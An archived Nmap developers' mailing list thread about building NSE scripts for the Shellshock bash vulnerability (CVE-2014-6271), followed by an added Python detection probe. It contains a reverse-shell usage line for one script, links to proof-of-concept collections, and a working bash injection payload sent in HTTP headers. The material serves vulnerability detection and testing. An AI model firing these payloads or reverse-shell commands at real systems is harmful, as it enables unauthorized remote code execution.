Nmap Development mailing list archives
Re: Shell Shock NSE Script (CVE-2014-6271)
From: Shritam Bhowmick <shritam.bhowmick () gmail com>
Date: Sat, 11 Oct 2014 20:12:05 +0530
Hi list, while working on the script and the POC, I found out post exploitation would be a great added advantage.

Regards
Shritam Bhowmick
Technical Specialist and Web Application Penetration Tester, Defencely
http://www.defencely.com

On Fri, Oct 10, 2014 at 5:24 AM, stripes <stripes () tigerlair com> wrote:
Same here. I can help test.
-Anne

On Thu, Oct 09, 2014 at 06:35:58PM -0500, Richard Miles wrote:
You rock Paulino, awesome!! I can't help much, but I'm available to test. Thanks

On Thu, Oct 9, 2014 at 9:35 AM, Paulino Calderon <paulino () calderonpale com> wrote:
I think it is definitely worth working on detection modules. I will go through all of the PoCs over the weekend to improve the detection module for http and submit other scripts for the other well-known services. Cheers.

On Oct 2, 2014, at 4:57 PM, Richard Miles <richard.k.miles () googlemail com> wrote:
Hi guys, This vulnerability is awesome, why not create a set of tests for common vulnerable applications? For example, test against well-known web applications, FTP servers, SMTP, FTP servers, etc. I have seen exploits for almost all these systems, I guess that a single script or a couple of them to detect would be AWESOME.

Examples:
- Pure-FTPd External Authentication Bash Environment Variable Code Injection by Frank Denis, Spencer McIntyre, and Stephane Chazelas exploits - Metasploit
- Apache mod_cgi Bash Environment Variable Code Injection by wvu, juan vazquez, Stephane Chazelas, and lcamtuf exploits CVE-2014-6278 - Metasploit
- Apache mod_cgi Bash Environment Variable RCE Scanner by wvu, Stephane Chazelas, and lcamtuf exploits CVE-2014-6278 and - Metasploit

Here is a collection of POCs:
https://github.com/mubix/shellshocker-pocs
https://www.dfranke.us/posts/2014-09-27-shell-shock-exploitation-vectors.html
What do you think guys? Thanks.

On Wed, Oct 1, 2014 at 3:11 AM, Paulino Calderon <paulino () calderonpale com> wrote:
Hello everyone, I've cleaned up the script and improved a few things:
https://bitbucket.org/cldrn/nmap-nse-scripts/src/111b0a2439b22cb287572f5b45fd7991814ec6cf/scripts/6.x/http-shellshock.nse?at=master
I've tested the script against the VM and it works perfectly. Obviously more testing is appreciated but I think it is ready for submission. Cheers.
On Sep 26, 2014, at 3:45 AM, Paul Amar <paul () sensepost com> wrote:
Hi list, I created a NSE script for the Shell Shock vulnerability (CVE-2014-6271). I tested the script with Pentesterlab's VM located here: files.pentesterlab.com/cve-2014-6271/cve-2014-6271.iso. This script detects if the host is vulnerable. If so, you get a reverse shell by specifying the good arguments. Eg.

./nmap -p80 --script http-vuln-cve-2014-6271.nse --script-args http-vuln-cve-2014-6271.remoteIp=<your-ip>,http-vuln-cve-2014-6271.remotePort=<your-port>,http-vuln-cve-2014-6271.uri=/cgi-bin/status <ip> -d

Feel free to send any feedback,
Paul
<http-vuln-cve-2014-6271.nse>

--
stripes at tigerlair dot com

_______________________________________________
Sent through the dev mailing list http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/
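For readers who want to see the detection half of the scripts discussed in this thread outside of Nmap, the following is an added example in Python. It is not Paul Amar's http-vuln-cve-2014-6271.nse nor Paulino Calderon's http-shellshock.nse, and it does no post exploitation or reverse shell. The CGI path /cgi-bin/status is taken from Paul's usage line; the header names used to carry the payload, the marker format and every function name are assumptions made for illustration.

```python
"""Stand-alone Shellshock (CVE-2014-6271) HTTP/CGI detection probe.

Added example, not the NSE script from the thread. Header names, marker
format and function names are illustrative assumptions.
"""
import secrets
import socket
import sys


def make_marker(nonce=None):
    """Return (form_sent_in_request, form_expected_in_response).

    The request carries the marker split by an empty string
    (SHEL""LSHOCK-<nonce>); bash collapses the empty quotes when it runs
    the echo, so the joined form can only come from real execution. A CGI
    that merely reflects request headers reproduces the split form, which
    keeps such servers from being reported as vulnerable.
    """
    nonce = nonce or secrets.token_hex(4)
    return 'SHEL""LSHOCK-' + nonce, "SHELLSHOCK-" + nonce


def build_payload(request_marker):
    """Classic CVE-2014-6271 trigger: a function definition followed by
    trailing commands that vulnerable bash executes while importing the
    variable. The two echos emit a blank line so the CGI header section
    ends and the marker lands in the HTTP body."""
    return "() { :;}; echo; echo; /bin/bash -c 'echo %s'" % request_marker


def build_probe_request(host, uri, payload):
    """Raw HTTP/1.0 request with the payload in headers that web servers
    commonly export to CGI as HTTP_USER_AGENT and HTTP_REFERER."""
    lines = [
        "GET %s HTTP/1.0" % uri,
        "Host: %s" % host,
        "User-Agent: %s" % payload,
        "Referer: %s" % payload,
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode()


def response_indicates_vulnerable(response, response_marker):
    """True only if the joined marker appears anywhere in the response."""
    if isinstance(response, bytes):
        response = response.decode("latin-1", "replace")
    return response_marker in response


def probe_host(host, port, uri="/cgi-bin/status", timeout=5.0, nonce=None):
    """Send the probe over a plain TCP socket and classify the answer."""
    req_marker, resp_marker = make_marker(nonce)
    request = build_probe_request(host, uri, build_payload(req_marker))
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return response_indicates_vulnerable(b"".join(chunks), resp_marker)


if __name__ == "__main__":
    # usage: python probe.py <host> <port> [<cgi-uri>]
    target, tport = sys.argv[1], int(sys.argv[2])
    path = sys.argv[3] if len(sys.argv) > 3 else "/cgi-bin/status"
    print("vulnerable" if probe_host(target, tport, path) else "not vulnerable")
```

The split marker is the check worth keeping: a detection that greps the response for the same string it sent will flag any CGI that echoes request headers back. Note also what the probe cannot tell you: a CGI that is not backed by bash (or a server that does not export those headers into the environment) will simply answer normally, so a negative result only means this URI did not trigger, not that the host's bash is patched.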
Current thread:
- Re: Shell Shock NSE Script (CVE-2014-6271) Paulino Calderon (Oct 01)
- Re: Shell Shock NSE Script (CVE-2014-6271) Richard Miles (Oct 02)
- Re: Shell Shock NSE Script (CVE-2014-6271) Paulino Calderon (Oct 09)
- Re: Shell Shock NSE Script (CVE-2014-6271) Richard Miles (Oct 09)
- Re: Shell Shock NSE Script (CVE-2014-6271) stripes (Oct 09)
- Re: Shell Shock NSE Script (CVE-2014-6271) Shritam Bhowmick (Oct 11)
- Re: Shell Shock NSE Script (CVE-2014-6271) Paulino Calderon (Oct 09)
- Re: Shell Shock NSE Script (CVE-2014-6271) Richard Miles (Oct 14)
- Re: Shell Shock NSE Script (CVE-2014-6271) Paulino Calderon (Dec 01)
- Re: Shell Shock NSE Script (CVE-2014-6271) Richard Miles (Oct 02)